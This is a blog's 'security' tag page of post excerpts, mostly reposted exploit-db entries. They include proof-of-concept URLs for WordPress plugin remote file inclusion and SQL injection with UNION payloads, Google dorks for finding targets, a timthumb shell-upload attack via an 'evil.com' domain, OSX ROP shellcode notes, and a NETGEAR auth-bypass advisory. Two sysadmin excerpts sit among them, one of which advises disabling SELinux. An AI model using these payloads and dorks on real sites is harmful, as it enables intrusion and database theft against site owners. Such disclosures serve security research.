Browsed by
Tag: security

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

After installing everything on your CentOS server (I mean a LAMP2 environment on CentOS), when you install ionCube you see the error message:

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Relax, neither you nor your server is evil. This happens because SELinux is monitoring things, permissions and so on, so we will have to disable the thing :(. To disable SELinux, follow the steps below: vim

Information Security

Information Security (part 1) – Concepts, Mod NUB 1

I title this article “mod nub 1” because I consider it extremely basic for anyone who wants to go deeper into a subject that is really a whole world (and mind you, not a new one): vast, not fully explored, and a field where the level of knowledge is pushed to the extreme and demands more than daily self-improvement. (Hard to understand, isn't it?… NO!) Again, I do not justify the term nub 1 for people who…

OSX universal ROP shellcode, tested on Snow Leopard

; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you…

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

Sense of Security – Security Advisory – SOS-11-011

Release Date. 20-Sep-2011
Last Update. –
Vendor Notification Date. 22-Mar-2011
Product. NETGEAR Wireless Cable Modem Gateway CG814WG
Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others
Severity Rating. High
Impact. Authentication bypass, Cross Site Request Forgery
Attack Vector. Remote without authentication
Solution Status. Upgrade to R15 (by contacting NETGEAR)
CVE reference. Not yet assigned

Details.
The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISPs as customer premises equipment within…

Multiple WordPress Plugin timthumb.php Vulnerabilities

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

--- Description ---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the…

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

--- PoC ---
http://SERVER/dbunixwp_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code ---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
  define('dbunixwp_USE_THEMES', false);
  require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Source: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)

--- PoC ---
http://SERVER/dbunixwp_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI
(requires POSTing a file with ID wpmm-upload for this to work)

--- Vulnerable Code ---
if (isset($_FILES['wpmm-upload'])) {
  // Create WordPress environment
  require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');
  // Handle attachment
  WPMiniMail::wpmm_upload();
}

Source: http://www.exploit-db.com/exploits/17868/

WordPress yolink Search plugin <= 1.1.4 SQL Injection

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();
if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; }
if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; }
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size...

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip
# Version: 0.12 (tested)
# Note: magic_quotes has to be turned off

--- PoC ---
http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20

---------------
Vulnerable code
---------------
$table_name = $wpdb->prefix . "posts";
…
if (isset($_GET['post_gallery']))
  $query = 'SELECT * FROM '.$table_name.' WHERE post_parent = \''.$_GET['post_gallery'].'\' AND post_mime_type = \'audio/mpeg\' ORDER BY menu_order ASC';

Source: http://www.exploit-db.com/exploits/17756/

How to connect to Mac OS X Snow Leopard | Lion via Remote Desktop

Well, folks, we at 4ppun1x connected remotely to this wonderful BSD that is the Mac so that we could make remote adjustments to our PC. This how-to comes down to enabling the Mac's VNC support together with a security password, so that our Mac can safely accept network connections without any stress. We are using Mac OS X Snow Leopard (it also works on Mac OS X Lion), along with an ordinary connection (made from a…
